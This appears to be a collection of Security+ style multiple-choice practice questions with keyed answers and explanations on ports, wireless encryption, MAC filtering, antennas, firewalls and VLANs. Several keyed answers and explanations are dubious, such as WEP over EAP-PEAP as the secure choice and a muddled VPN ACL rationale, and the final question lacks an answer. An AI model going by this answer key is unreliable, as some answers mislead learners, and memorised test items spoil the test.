A technician has just installed a new firewall onto the network. Users are reporting that theycannot reach any website. Upon further investigation, the technician determines that websites canbe reached by entering their IP addresses. Which of the following ports may have been closed tocause this issue?A. HTTPB. DHCPC. DNSD. NetBIOS |
Answer: CExplanation: DNS links IP addresses and human-friendly fully qualified domain names (FQDNs), which aremade up of the Top-level domain (TLD), the registered domain name, and the Subdomain orhostname.Therefore, if the DNS ports are blocked websites will not be reachable. |
|
|
Which of the following ports would be blocked if Pete, a security administrator, wants to denyaccess to websites?A. 21B. 25C. 80D. 3389 |
Answer: CExplanation: Port 80 is used by HTTP, which is the foundation of data communication for the World Wide Web. |
|
|
A technician is unable to manage a remote server. Which of the following ports should be openedon the firewall for remote server management? (Select TWO).A. 22B. 135C. 137D. 143E. 443F. 3389 |
Answer: A,FExplanation: A secure remote administration solution and Remote Desktop protocol is required.Secure Shell (SSH) is a secure remote administration solution and makes use of TCP port 22.Remote Desktop Protocol (RDP) uses TCP port 3389. |
|
|
Ann, a technician, is attempting to establish a remote terminal session to an end user’s computerusing Kerberos authentication, but she cannot connect to the destination machine. Which of thefollowing default ports should Ann ensure is open?A. 22B. 139 C. 443D. 3389 |
Answer: DExplanation: Remote Desktop Protocol (RDP) uses TCP port 3389. |
|
|
Which of the following protocols operates at the HIGHEST level of the OSI model?A. ICMPB. IPSecC. SCPD. TCP |
Answer: CExplanation: SCP (Secure Copy) uses SSH (Secure Shell). SSH runs in the application layer (layer 7) of theOSI model. |
|
|
Which of the following allows Pete, a security technician, to provide the MOST secure wirelessimplementation?A. Implement WPAB. Disable SSIDC. Adjust antenna placementD. Implement WEP |
Answer: AExplanation: Of the options supplied, WiFi Protected Access (WPA) is the most secure and is thereplacement for WEP |
|
|
A malicious user is sniffing a busy encrypted wireless network waiting for an authorized client to connect to it. Only after an authorized client has connected and the hacker was able to capture theclient handshake with the AP can the hacker begin a brute force attack to discover the encryptionkey. Which of the following attacks is taking place?A. IV attackB. WEP crackingC. WPA crackingD. Rogue AP |
Answer: CExplanation: There are three steps to penetrating a WPA-protected network.SniffingParsingAttacking |
|
|
Which of the following is a step in deploying a WPA2-Enterprise wireless network?A. Install a token on the authentication serverB. Install a DHCP server on the authentication serverC. Install an encryption key on the authentication serverD. Install a digital certificate on the authentication server |
Answer: DExplanation: When setting up a wireless network, you’ll find two very different modes of Wi-Fi Protected Access(WPA) security, which apply to both the WPA and WPA2 versions.The easiest to setup is the Personal mode, technically called the Pre-Shared Key (PSK) mode. Itdoesn’t require anything beyond the wireless router or access points (APs) and uses a singlepassphrase or password for all users/devices.The other is the Enterprise mode —which should be used by businesses and organizations—andis also known as the RADIUS, 802.1X, 802.11i, or EAP mode. It provides better security and keymanagement, and supports other enterprise-type functionality, such as VLANs and NAP.However, it requires an external authentication server, called a Remote Authentication Dial In UserService (RADIUS) server to handle the 802.1X authentication of users.To help you better understand the process of setting up WPA/WPA2-Enterprise and 802.1X,here’s the basic overall steps:Choose, install, and configure a RADIUS server, or use a hosted service. Create a certificate authority (CA), so you can issue and install a digital certificate onto theRADIUS server, which may be done as a part of the RADIUS server installation and configuration.Alternatively, you could purchase a digital certificate from a public CA, such as GoDaddy orVerisign, so you don’t have to install the server certificate on all the clients. If using EAP-TLS,you’d also create digital certificates for each end-user.On the server, populate the RADIUS client database with the IP address and shared secret foreach AP.On the server, populate user data with usernames and passwords for each end-user.On each AP, configure the security for WPA/WPA2-Enterprise and input the RADIUS server IPaddress and the shared secret you created for that particular AP.On each Wi-Fi computer and device, configure the security for WPA/WPA2-Enterprise and set the802.1X authentication settings. |
|
|
A security administrator must implement a wireless security system, which will require users toenter a 30 character ASCII password on their accounts. Additionally the system must support 3DSwireless encryption.Which of the following should be implemented?A. WPA2-CCMP with 802.1XB. WPA2-PSKC. WPA2-CCMPD. WPA2-Enterprise |
Answer: DExplanation: D: WPA-Enterprise is also referred to as WPA-802.1X mode, and sometimes just WPA (asopposed to WPA-PSK), this is designed for enterprise networks and requires a RADIUSauthentication server. This requires a more complicated setup, but provides additional security(e.g. protection against dictionary attacks on short passwords). Various kinds of the ExtensibleAuthentication Protocol (EAP) are used for authentication. RADIUS can be managed centrally,and the servers that allow access to a network can verify with a RADIUS server whether anincoming caller is authorized. Thus the RADIUS server can perform all authentications. This willrequire users to use their passwords on their user accounts. |
|
|
Configuring key/value pairs on a RADIUS server is associated with deploying which of thefollowing?A. WPA2-Enterprise wireless networkB. DNS secondary zonesC. Digital certificatesD. Intrusion detection system |
Answer: AExplanation: WPA2-Enterprise is designed for enterprise networks and requires a RADIUS authenticationserver. |
|
|
A security administrator must implement a network authentication solution which will ensure encryption of user credentials when users enter their username and password to authenticate tothe network. Which of the following should the administrator implement? A. WPA2 over EAP-TTLS B. WPA-PSK C. WPA2 with WPS D. WEP over EAP-PEAP |
Answer: D Explanation: D: Wired Equivalent Privacy (WEP) is designed to provide security equivalent to that of a wirednetwork. WEP has vulnerabilities and isn’t considered highly secure. Extensible Authentication Protocol (EAP) provides a framework for authentication that is often used with wireless networks.Among the five EAP types adopted by the WPA/ WPA2 standard are EAP-TLS, EAP-PSK, EAPMD5, as well as LEAP and PEAP.PEAP is similar in design to EAP-TTLS, requiring only a server-side PKI certificate to create asecure TLS tunnel to protect user authentication, and uses server-side public key certificates toauthenticate the server. It then creates an encrypted TLS tunnel between the client and theauthentication server. In most configurations, the keys for this encryption are transported using theserver's public key. The ensuing exchange of authentication information inside the tunnel toauthenticate the client is then encrypted and user credentials are safe from eavesdropping. |
|
|
Which of the following BEST describes the weakness in WEP encryption?A. The initialization vector of WEP uses a crack-able RC4 encryption algorithm. Once enough packets are captured an XOR operation can be performed and the asymmetric keyscan be derived.B. The WEP key is stored in plain text and split in portions across 224 packets of random data.Once enough packets are sniffed the IV portion of the packets can be removed leaving the plaintext key.C. The WEP key has a weak MD4 hashing algorithm used.A simple rainbow table can be used to generate key possibilities due to MD4 collisions.D. The WEP key is stored with a very small pool of random numbers to make the cipher text.As the random numbers are often reused it becomes easy to derive the remaining WEP key. |
Answer: DExplanation: WEP is based on RC4, but due to errors in design and implementation, WEP is weak in a numberof areas, two of which are the use of a static common key and poor implementation of initiationvectors (IVs). When the WEP key is discovered, the attacker can join the network and then listenin on all other wireless client communications. |
|
|
Which of the following would satisfy wireless network implementation requirements to use mutualauthentication and usernames and passwords?A. EAP-MD5B. WEPC. PEAP-MSCHAPv2D. EAP-TLS |
Answer: CExplanation: PEAP-MS-CHAP v2 is easier to deploy than EAP-TLS or PEAP-TLS because user authenticationis accomplished via password-base credentials (user name and password) rather than digitalcertificates or smart cards. |
|
|
Matt, a systems security engineer, is determining which credential-type authentication to usewithin a planned 802.1x deployment. He is looking for a method that does not require a clientcertificate, has a server side certificate, and uses TLS tunnels for encryption. Which credentialtype authentication method BEST fits these requirements?A. EAP-TLSB. EAP-FASTC. PEAP-CHAPD. PEAP-MSCHAPv2 |
Answer: DExplanation: PEAP-MS-CHAP v2 is easier to deploy than EAP-TLS or PEAP-TLS because user authenticationis accomplished via password-base credentials (user name and password) rather than digitalcertificates or smart cards. Only servers running Network Policy Server (NPS) or PEAP-MS-CHAPv2 are required to have a certificate
|
|
|
Which of the following means of wireless authentication is easily vulnerable to spoofing?A. MAC FilteringB. WPA - LEAPC. WPA - PEAPD. Enabled SSID |
Answer: AExplanation: Each network interface on your computer or any other networked device has a unique MACaddress. These MAC addresses are assigned in the factory, but you can easily change, or “spoof,”MAC addresses in software.Networks can use MAC address filtering, only allowing devices with specific MAC addresses toconnect to a network. This isn’t a great security tool because people can spoof their MACaddresses |
|
|
Ann, a sales manager, successfully connected her company-issued smartphone to the wirelessnetwork in her office without supplying a username/password combination. Upon disconnecting from the wireless network, she attempted to connect her personal tablet computer to the samewireless network and could not connect.Which of the following is MOST likely the reason?A. The company wireless is using a MAC filter.B. The company wireless has SSID broadcast disabled.C. The company wireless is using WEP.D. The company wireless is using WPA2. |
Answer: AExplanation: MAC filtering allows you to include or exclude computers and devices based on their MACaddress |
|
|
After entering the following information into a SOHO wireless router, a mobile device’s userreports being unable to connect to the network:PERMIT 0A: D1: FA. B1: 03: 37DENY 01: 33: 7F: AB: 10: ABWhich of the following is preventing the device from connecting?A. WPA2-PSK requires a supplicant on the mobile device.B. Hardware address filtering is blocking the device.C. TCP/IP Port filtering has been implemented on the SOHO router.D. IP address filtering has disabled the device from connecting. |
Answer: BExplanation: MAC filtering allows you to include or exclude computers and devices based on their MACaddress. |
|
|
A security analyst has been tasked with securing a guest wireless network. They recommend thecompany use an authentication server but are told the funds are not available to set this up. Which of the following BEST allows the analyst to restrict user access to approved devices? A. Antenna placement B. Power level adjustment C. Disable SSID broadcasting D. MAC filtering |
Answer: D Explanation: A MAC filter is a list of authorized wireless client interface MAC addresses that is used by a WAPto block access to all unauthorized devices. |
|
|
If you don’t know the MAC address of a Linux-based machine, what command-line utility can youuse to ascertain it?A. macconfigB. ifconfigC. ipconfigD. config |
Answer: BExplanation: To find MAC address of a Unix/Linux workstation, use ifconfig or ip a. |
|
|
An organization does not want the wireless network name to be easily discovered. Which of thefollowing software features should be configured on the access points?A. SSID broadcastB. MAC filterC. WPA2D. Antenna placement |
Answer: AExplanation: Numerous networks broadcast their name (known as an SSID broadcast) to reveal their presence.
|
|
|
A security architect wishes to implement a wireless network with connectivity to the company’sinternal network. Before they inform all employees that this network is being put in place, thearchitect wants to roll it out to a small test segment. Which of the following allows for greatersecrecy about this network during this initial phase of implementation?A. Disabling SSID broadcastingB. Implementing WPA2 - TKIPC. Implementing WPA2 - CCMPD. Filtering test workstations by MAC address |
Answer: AExplanation: Network administrators may choose to disable SSID broadcast to hide their network fromunauthorized personnel. However, the SSID is still needed to direct packets to and from the basestation, so it’s a discoverable value using a wireless packet sniffer. Thus, the SSID should bedisabled if the network isn’t for public use. |
|
|
While previously recommended as a security measure, disabling SSID broadcast is not effectiveagainst most attackers because network SSIDs are:A. no longer used to authenticate to most wireless networks.B. contained in certain wireless packets in plaintext.C. contained in all wireless broadcast packets by default.D. no longer supported in 802.11 protocols. |
Answer: BExplanation: The SSID is still required for directing packets to and from the base station, so it can bediscovered using a wireless packet sniffer. |
|
|
A company provides secure wireless Internet access for visitors and vendors working onsite.Some of the vendors using older technology report that they are unable to access the wireless network after entering the correct network information. Which of the following is the MOST likelyreason for this issue?A. The SSID broadcast is disabled.B. The company is using the wrong antenna type.C. The MAC filtering is disabled on the access point.D. The company is not using strong enough encryption. |
Answer: AExplanation: When the SSID is broadcast, any device with an automatic detect and connect feature is able tosee the network and can initiate a connection with it. The fact that they cannot access the networkmeans that they are unable to see it. |
|
|
Which of the following best practices makes a wireless network more difficult to find?A. Implement MAC filteringB. UseWPA2-PSKC. Disable SSID broadcastD. Power down unused WAPs |
Answer: CExplanation: Network administrators may choose to disable SSID broadcast to hide their network fromunauthorized personnel. However, the SSID is still needed to direct packets to and from the basestation, so it’s a discoverable value using a wireless packet sniffer. Thus, the SSID should bedisabled if the network isn’t for public use. |
|
|
QUESTION NO: 167 Jane, the security administrator, sets up a new AP but realizes too many outsiders are able toconnect to that AP and gain unauthorized access. Which of the following would be the BEST wayto mitigate this issue and still provide coverage where needed? (Select TWO).A. Disable the wired portsB. Use channels 1, 4 and 7 onlyC. Enable MAC filteringD. Disable SSID broadcast E. Switch from 802.11a to 802.11b |
Answer: C,DExplanation: Network administrators may choose to disable SSID broadcast to hide their networkfrom unauthorized personnel. However, the SSID is still needed to direct packets to and from thebase station, so it’s a discoverable value using a wireless packet sniffer. Thus, the SSID should bedisabled if the network isn’t for public use.A MAC filter is a list of authorized wireless client interface MAC addresses that is used by a WAPto block access to all unauthorized devices. |
|
|
Which of the following wireless security technologies continuously supplies new keys for WEP?A. TKIPB. Mac filteringC. WPA2D. WPA |
Answer: AExplanation: TKIP is a suite of algorithms that works as a "wrapper" to WEP, which allows users of legacyWLAN equipment to upgrade to TKIP without replacing hardware. TKIP uses the original WEPprogramming but "wraps" additional code at the beginning and end to encapsulate and modify it. |
|
|
A network administrator has been tasked with securing the WLAN. Which of the followingcryptographic products would be used to provide the MOST secure environment for the WLAN?A. WPA2 CCMPB. WPAC. WPA with MAC filteringD. WPA2 TKIP |
Answer: AExplanation: CCMP is the standard encryption protocol for use with the WPA2 standard and is much moresecure than the WEP protocol and TKIP protocol of WPA. CCMP provides the following security
services:Data confidentiality; ensures only authorized parties can access the informationAuthentication; provides proof of genuineness of the userAccess control in conjunction with layer managementBecause CCMP is a block cipher mode using a 128-bit key, it is secure against attacks to the 264steps of operation. |
|
|
An access point has been configured for AES encryption but a client is unable to connect to it.Which of the following should be configured on the client to fix this issue?A. WEPB. CCMPC. TKIPD. RC4 |
Answer: BExplanation: CCMP is an encryption protocol designed for Wireless LAN products that implement the standardsof the IEEE 802.11i amendment to the original IEEE 802.11 standard. CCMP is an enhanced datacryptographic encapsulation mechanism designed for data confidentiality and based upon theCounter Mode with CBC-MAC (CCM) of the AES standard. |
|
|
A security administrator wishes to increase the security of the wireless network. Which of thefollowing BEST addresses this concern?A. Change the encryption from TKIP-based to CCMP-based.B. Set all nearby access points to operate on the same channel.C. Configure the access point to use WEP instead of WPA2.D. Enable all access points to broadcast their SSIDs. |
Answer: AExplanation: CCMP makes use of 128-bit AES encryption with a 48-bit initialization vector. This initializationvector makes cracking a bit more difficult. |
|
|
The security administrator has been tasked to update all the access points to provide a moresecure connection. All access points currently use WPA TKIP for encryption. Which of thefollowing would be configured to provide more secure connections?A. WEPB. WPA2 CCMPC. Disable SSID broadcast and increase power levelsD. MAC filtering |
Answer: BExplanation: CCMP makes use of 128-bit AES encryption with a 48-bit initialization vector. This initializationvector makes cracking a bit more difficult. |
|
|
A system administrator wants to enable WPA2 CCMP. Which of the following is the onlyencryption used?A. RC4B. DESC. 3DESD. AES |
Answer: DExplanation: Cipher Block Chaining Message Authentication Code Protocol (CCMP) makes use of 128-bit AESencryption with a 48-bit initialization vector. |
|
|
Jane, an administrator, needs to make sure the wireless network is not accessible from theparking area of their office. Which of the following would BEST help Jane when deploying a newaccess point? A. Placement of antennaB. Disabling the SSIDC. Implementing WPA2D. Enabling the MAC filtering |
Answer: AExplanation: You should try to avoid placing access points near metal (which includes appliances) or near theground. Placing them in the center of the area to be served and high enough to get around mostobstacles is recommended. On the chance that the signal is actually traveling too far, someaccess points include power level controls, which allow you to reduce the amount of outputprovided |
|
|
A security team has identified that the wireless signal is broadcasting into the parking lot. Toreduce the risk of an attack against the wireless network from the parking lot, which of thefollowing controls should be used? (Select TWO).A. Antenna placementB. InterferenceC. Use WEPD. Single Sign onE. Disable the SSIDF. Power levels |
Answer: A,FExplanation: Placing the antenna in the correct position is crucial. You can then adjust the power levels toexclude the parking lot. |
|
|
Which of the following would Pete, a security administrator, do to limit a wireless signal frompenetrating the exterior walls?A. Implement TKIP encryptionB. Consider antenna placementC. Disable the SSID broadcastD. Disable WPA |
Answer: BExplanation: Cinderblock walls, metal cabinets, and other barriers can reduce signal strengthsignificantly. Therefore, antenna placement is critical. |
|
|
Ann, a security administrator, has concerns regarding her company’s wireless network. Thenetwork is open and available for visiting prospective clients in the conference room, but shenotices that many more devices are connecting to the network than should be.Which of the following would BEST alleviate Ann’s concerns with minimum disturbance of currentfunctionality for clients?A. Enable MAC filtering on the wireless access point.B. Configure WPA2 encryption on the wireless access point.C. Lower the antenna’s broadcasting power.D. Disable SSID broadcasting |
Answer: CExplanation: Some access points include power level controls that allow you to reduce the amount of outputprovided if the signal is traveling too far. |
|
|
After reviewing the firewall logs of her organization’s wireless APs, Ann discovers an unusuallyhigh amount of failed authentication attempts in a particular segment of the building. Sheremembers that a new business moved into the office space across the street. Which of thefollowing would be the BEST option to begin addressing the issue?A. Reduce the power level of the AP on the network segmentB. Implement MAC filtering on the AP of the affected segmentC. Perform a site survey to see what has changed on the segmentD. Change the WPA2 encryption key of the AP in the affected segment |
Answer: AExplanation: Some access points include power level controls that allow you to reduce the amount of outputprovided if the signal is traveling too far. |
|
|
An administrator wants to establish a WiFi network using a high gain directional antenna with anarrow radiation pattern to connect two buildings separated by a very long distance. Which of thefollowing antennas would be BEST for this situation?A. DipoleB. YagiC. SectorD. Omni |
Answer: BExplanation: A Yagi-Uda antenna, commonly known simply as a Yagi antenna, is a directional antennaconsisting of multiple parallel dipole elements in a line, usually made of metal rods. It consists of asingle driven element connected to the transmitter or receiver with a transmission line, andadditional parasitic elements: a so-called reflector and one or more directors. The reflectorelement is slightly longer than the driven dipole, whereas the directors are a little shorter. Thisdesign achieves a very substantial increase in the antenna's directionality and gain compared to asimple dipole. |
|
|
A company has recently implemented a high density wireless system by having a junior technicianinstall two new access points for every access point already deployed. Users are now reportingrandom wireless disconnections and slow network connectivity. Which of the following is theMOST likely cause?A. The old APs use 802.11aB. Users did not enter the MAC of the new APsC. The new APs use MIMOD. A site survey was not conducted |
Answer: DExplanation: To test the wireless AP placement, a site survey should be performed. |
|
|
A Windows-based computer is infected with malware and is running too slowly to boot and run amalware scanner. Which of the following is the BEST way to run the malware scanner?A. Kill all system processesB. Enable the firewallC. Boot from CD/USBD. Disable the network connection |
Answer: CExplanation: Antivirus companies frequently create boot discs you can use to scan and repair your computer.These tools can be burned to a CD or DVD or installed onto a USB drive. You can then restartyour computer and boot from the removable media. A special antivirus environment will loadwhere your computer can be scanned and repaired.Incorrect Options:A: Kill all system processes will stop system processes, and could have a negative effect on thesystem. It is not the BEST way to run the malware scannerB: The basic purpose of a firewall is to isolate one network from another. It is not the BEST way torun the malware scanner.D: Disabling the network connection will not allow for the BEST way to run the malware scanner.Reference:http://www.howtogeek.com/187037/how-to-scan-and-repair-a-badly-infected-computer-fromoutside-windows/Dulaney, Emmett and Chuck Eastton, CompTIA Security+ Study Guide, 6th Edition, Sybex,Indianapolis, 2014, p. 342 |
|
|
A company administrator has a firewall with an outside interface connected to the Internet and aninside interface connected to the corporate network. Which of the following should theadministrator configure to redirect traffic destined for the default HTTP port on the outsideinterface to an internal server listening on port 8080?A. Create a dynamic PAT from port 80 on the outside interface to the internal interface on port8080 B. Create a dynamic NAT from port 8080 on the outside interface to the server IP address on port80C. Create a static PAT from port 80 on the outside interface to the internal interface on port 8080D. Create a static PAT from port 8080 on the outside interface to the server IP address on port 80 |
Answer: CExplanation: Static PAT translations allow a specific UDP or TCP port on a global address to be translated to aspecific port on a local address. In this case, the default HTTP port (80) is the global address to betranslated, and port 8080 is the specific port on a local address. Incorrect Options:A: Dynamic PAT is not a valid type of PAT.B: Dynamic NAT translates a group of real addresses to a pool of mapped addresses that areroutable on the destination network. The question also states that the internal server is listening onport 8080.D: The question states that the internal server is listening on port 8080. |
|
|
An overseas branch office within a company has many more technical and non-technical securityincidents than other parts of the company. Which of the following management controls should beintroduced to the branch office to improve their state of security?A. Initial baseline configuration snapshotsB. Firewall, IPS and network segmentationC. Event log analysis and incident responseD. Continuous security monitoring processes
|
Answer: DExplanation: Continuous monitoring may involve regular measurements of network traffic levels, routineevaluations for regulatory compliance, and checks of network security device configurations. Italso points toward the never-ending review of what resources a user actually accesses, which iscritical for preventing insider threats.
Incorrect Options:A: An initial baseline configuration snapshot would allow for the standardized minimal level ofsecurity that all systems in an organization must comply with to be enforced. This will not cover thenon-technical security incidents.B: A Firewall, IPS and network segmentation will offer technical protection, but not non-technicalsecurity protection.C: Event log analysis and incident response will not cover the non-technical security incidents |
|
|
Which of the following is a directional antenna that can be used in point-to-point or point-to-multipoint WiFi communication systems? (Select TWO).A. BackfireB. DipoleC. OmniD. PTZE. Dish
|
Answer: A,EExplanation: Both the Backfire and the Dish antennae are high gain antenna types that transmit a narrow beamof signal. It can therefore be used as a point-to-point antenna over short distances, but as point-tomulti-point antenna over longer distances.
|
|
|
Which of the following would be MOST appropriate to secure an existing SCADA system bypreventing connections from unauthorized networks?A. Implement a HIDS to protect the SCADA systemB. Implement a Layer 2 switch to access the SCADA systemC. Implement a firewall to protect the SCADA systemD. Implement a NIDS to protect the SCADA system
|
Answer: CExplanation: Firewalls manage traffic using filters, which is just a rule or set of rules. A recommended guidelinefor firewall rules is, “deny by default; allow by exception”. This means that if a network connectionis not specifically allowed, it will be denied
|
|
|
The common method of breaking larger network address space into smaller networks is known as:A. subnetting.B. phishing.C. virtualization.D. packet filtering.
|
Answer: AExplanation: Subnetting is a dividing process used on networks to divide larger groups of hosts into smallercollections.
|
|
|
While securing a network it is decided to allow active FTP connections into the network. Which ofthe following ports MUST be configured to allow active FTP connections? (Select TWO).A. 20B. 21C. 22D. 68E. 69
|
Answer: A,BExplanation: FTP (File Transfer Protocol) makes use of ports 20 and 21
|
|
|
An administrator needs to secure a wireless network and restrict access based on the hardwareaddress of the device. Which of the following solutions should be implemented?A. Use a stateful firewallB. Enable MAC filteringC. Upgrade to WPA2 encryptionD. Force the WAP to use channel 1
|
Answer: BExplanation: MAC addresses are also known as an Ethernet hardware address (EHA), hardware address orphysical address. Enabling MAC filtering would allow for a WAP to restrict or allow access basedon the hardware address of the device.
|
|
|
A security administrator must implement a firewall rule to allow remote employees to VPN onto thecompany network. The VPN concentrator implements SSL VPN over the standard HTTPS port.Which of the following is the MOST secure ACL to implement at the company's gateway firewall?A. PERMIT TCP FROM ANY 443 TO 199.70.5.25 443B. PERMIT TCP FROM ANY ANY TO 199.70.5.23 ANYC. PERMIT TCP FROM 199.70.5.23 ANY TO ANY ANYD. PERMIT TCP FROM ANY 1024-65535 TO 199.70.5.23 443
|
Answer: DExplanation: The default HTTPS port is port 443. When configuring SSL VPN you can change the default portfor HTTPS to a port within the 1024-65535 range. This ACL will allow traffic from VPNs using the1024-65535 port range to access the company network via company's gateway firewall on port443.
|
|
|
It is MOST important to make sure that the firewall is configured to do which of the following?A. Alert management of a possible intrusion.B. Deny all traffic and only permit by exception.
C. Deny all traffic based on known signatures.D. Alert the administrator of a possible intrusion |
Answer: BExplanation: Firewalls manage traffic using filters, which is just a rule or set of rules. A recommended guidelinefor firewall rules is, “deny by default; allow by exception”.
|
|
|
An administrator needs to secure RADIUS traffic between two servers. Which of the following isthe BEST solution?A. Require IPSec with AH between the serversB. Require the message-authenticator attribute for each messageC. Use MSCHAPv2 with MPPE instead of PAPD. Require a long and complex shared secret for the servers
|
Answer: AExplanation: IPsec is used for a secure point-to-point connection traversing an insecure network such as theInternet. Authentication Header (AH) is a primary IPsec protocol that provides authentication of thesender’s data.
|
|
|
Ann, the Chief Information Officer (CIO) of a company, sees cloud computing as a way to save money while providing valuable services. She is looking for a cost-effective solution to assist in capacity planning as well as visibility into the performance of the network. Which of the following cloud technologies should she look into?
A. IaaS B. MaaS C. SaaS D. PaaS |
Answer: B Explanation: Monitoring-as-a-service (MaaS) is a cloud delivery model that falls under anything as a service(XaaS). MaaS allows for the deployment of monitoring functionalities for several other services and applications within the cloud. |
|
|
QUESTION NO: 193 Ann, the network administrator, is receiving reports regarding a particular wireless network in thebuilding. The network was implemented for specific machines issued to the developer department,but the developers are stating that they are having connection issues as well as slow bandwidth.Reviewing the wireless router's logs, she sees that devices not belonging to the developers areconnecting to the access point. Which of the following would BEST alleviate the developer'sreports?A. Configure the router so that wireless access is based upon the connecting device's hardwareaddress.B. Modify the connection's encryption method so that it is using WEP instead of WPA2.C. Implement connections via secure tunnel with additional software on the developer'scomputers.D. Configure the router so that its name is not visible to devices scanning for wireless networks.
|
Answer: AExplanation: MAC addresses are also known as an Ethernet hardware address (EHA), hardware address orphysical address. Enabling MAC filtering would allow for a WAP to restrict or allow access basedon the hardware address of the device.
|
|
|
An organization recently switched from a cloud-based email solution to an in-house email server.The firewall needs to be modified to allow for sending and receiving email. Which of the followingports should be open on the firewall to allow for email traffic? (Select THREE).A. TCP 22B. TCP 23C. TCP 25D. TCP 53E. TCP 110F. TCP 143G. TCP 445
|
Answer: C,E,FExplanation:Port 25 is used by Simple Mail Transfer Protocol (SMTP) for routing e-mail between mail servers.Port 110 is used for Post Office Protocol v3 (POP3), which is an application-layer Internetstandard protocol used by local e-mail clients to retrieve e-mail from a remote server over aTCP/IP connection.Port 143 is used by Internet Message Access Protocol (IMAP) for the management of emailmessages.
|
|
|
A technician wants to securely collect network device configurations and statistics through ascheduled and automated process. Which of the following should be implemented if configurationintegrity is most important and a credential compromise should not allow interactive logons?A. SNMPv3B. TFTPC. SSHD. TLS
|
Answer: AExplanation: SNMPv3 provides the following security features:Message integrity--Ensures that a packet has not been tampered with in transit.Authentication--Determines that the message is from a valid source.Encryption--Scrambles the content of a packet to prevent it from being learned by an unauthorizedsource.
|
|
|
A security administrator is tasked with ensuring that all devices have updated virus definition filesbefore they are allowed to access network resources. Which of the following technologies wouldbe used to accomplish this goal?A. NIDSB. NACC. DLPD. DMZE. Port Security
|
Answer: BExplanation: Network Access Control (NAC) means controlling access to an environment through strictadherence to and implementation of security policies.
|
|
|
The loss prevention department has purchased a new application that allows the employees tomonitor the alarm systems at remote locations. However, the application fails to connect to thevendor's server and the users are unable to log in. Which of the following are the MOST likelycauses of this issue? (Select TWO).A. URL filteringB. Role-based access controlsC. MAC filteringD. Port SecurityE. Firewall rules
|
Answer: A,EExplanation: A URL filter is used to block URLs (websites) to prevent users accessing the website.Firewall rules act like ACLs, and they are used to dictate what traffic can pass between the firewalland the internal network. Three possible actions can be taken based on the rule’s criteria:Block the connectionAllow the connectionAllow the connection only if it is secured Incorrect Options:B: Role-based Access Control is basically based on a user’s job description. When a user isassigned a specific role in an environment, that user’s access to objects is granted based on therequired tasks of that role. Since the sales team needs to save and print reports, they would not berestricted if restrictions were role-based.C: A MAC filter is a list of authorized wireless client interface MAC addresses that is used by aWAP to block access to all unauthorized devices.D: Port security works at level 2 of the OSI model and allows an administrator to configure switchports so that only certain MAC addresses can use the port.Reference:Stewart, James Michael, CompTIA Security+ Review Guide, Sybex, Indianapolis, 2014, pp. 19,61, 276Dulaney, Emmett and Chuck Eastton, CompTIA Security+ Study Guide, 6th Edition, Sybex, Indianapolis, 2014, p. 157
|
|
|
Ann is an employee in the accounting department and would like to work on files from her homecomputer. She recently heard about a new personal cloud storage service with an easy webinterface. Before uploading her work related files into the cloud for access, which of the following isthe MOST important security concern Ann should be aware of?A. Size of the filesB. Availability of the filesC. Accessibility of the files from her mobile deviceD. Sensitivity of the files
|
Answer: DExplanation: Cloud computing has privacy concerns, regulation compliance difficulties, use of open-/closedsource solutions, and adoption of open standards. It is also unsure whether cloud-based data isactually secured (or even securable)
|
|
|
An active directory setting restricts querying to only secure connections. Which of the following ports should be selected to establish a successful connection? A. 389 B. 440 C. 636 D. 3286 |
Answer: C Explanation: Port 636 is used for secure LDAP (LDAPS).Incorrect Options:A: Port 389 is used for LDAP.B: Port 440 is not used for secure Active Directory connections.D: Port 3286 is not used for secure Active Directory connections.
Reference:Dulaney, Emmett and Chuck Eastton, CompTIA Security+ Study Guide, 6th Edition, Sybex,Indianapolis, 2014, p. 147https://en.wikipedia.org/wiki/List_of_TCP_and_UDP_port_numbers |
|
|
Signed digital certificates used to secure communication with a web server are MOST commonlyassociated with which of the following ports?A. 25B. 53C. 143D. 443
|
Answer: DExplanation: HTTPS authenticates the website and corresponding web server with which one iscommunicating. HTTPS makes use of port 443.Incorrect Options:A: Port 25 is used by Simple Mail Transfer Protocol (SMTP) for routing e-mail between mailservers.B: Port 53 is used by Domain Name System (DNS).C: Port 143 is used by Internet Message Access Protocol (IMAP) for the management of emailmessages.Reference:https://en.wikipedia.org/wiki/HTTPShttps://en.wikipedia.org/wiki/List_of_TCP_and_UDP_port_numbers
|
|
|
An organization has three divisions: Accounting, Sales, and Human Resources. Users in the Accounting division require access to a server in the Sales division, but no users in the HumanResources division should have access to resources in any other division, nor should any users inthe Sales division have access to resources in the Accounting division. Which of the followingnetwork segmentation schemas would BEST meet this objective?A. Create two VLANS, one for Accounting and Sales, and one for Human Resources.B. Create one VLAN for the entire organization.C. Create two VLANs, one for Sales and Human Resources, and one for Accounting.D. Create three separate VLANS, one for each division.
|
Answer: DExplanation: A virtual local area network (VLAN) is a hardware-imposed network segmentation created byswitches. Communications between ports within the same VLAN occur without hindrance, butcommunications between VLANs require a routing function.
|
|
|
A retail store uses a wireless network for its employees to access inventory from anywhere in thestore. Due to concerns regarding the aging wireless network, the store manager has brought in aconsultant to harden the network. During the site survey, the consultant discovers that the networkwas using WEP encryption. Which of the following would be the BEST course of action for theconsultant to recommend?A. Replace the unidirectional antenna at the front of the store with an omni-directional antenna.B. Change the encryption used so that the encryption protocol is CCMP-based.C. Disable the network's SSID and configure the router to only access store devices based onMAC addresses.D. Increase the access point's encryption from WEP to WPA TKIP
|
Answer: BExplanation: CCMP is the standard encryption protocol for use with the WPA2 standard and is much moresecure than the WEP protocol and TKIP protocol of WPA. CCMP provides the following securityservices:Data confidentiality; ensures only authorized parties can access the informationAuthentication; provides proof of genuineness of the userAccess control in conjunction with layer managementIncorrect Options:A: The antenna type deals with signal strength and direction. It will not have a bearing on whethertechnology is older. C: This option would “cloak” the network, not harden the network.D: WPA2, which uses CCMP as its standard encryption protocol, more secure than WPA-TKIP.Reference:http://en.wikipedia.org/wiki/CCMPhttp://en.wikipedia.org/wiki/Wi-Fi_Protected_AccessStewart, James Michael, CompTIA Security+ Review Guide, Sybex, Indianapolis, 2014, pp. 61, 63
|
|
|
A server is configured to communicate on both VLAN 1 and VLAN 12. VLAN 1 communicationworks fine, but VLAN 12 does not. Which of the following MUST happen before the server cancommunicate on VLAN 12?A. The server's network switch port must be enabled for 802.11x on VLAN 12.B. The server's network switch port must use VLAN Q-in-Q for VLAN 12.C. The server's network switch port must be 802.1q untagged for VLAN 12.D. The server's network switch port must be 802.1q tagged for VLAN 12.
|
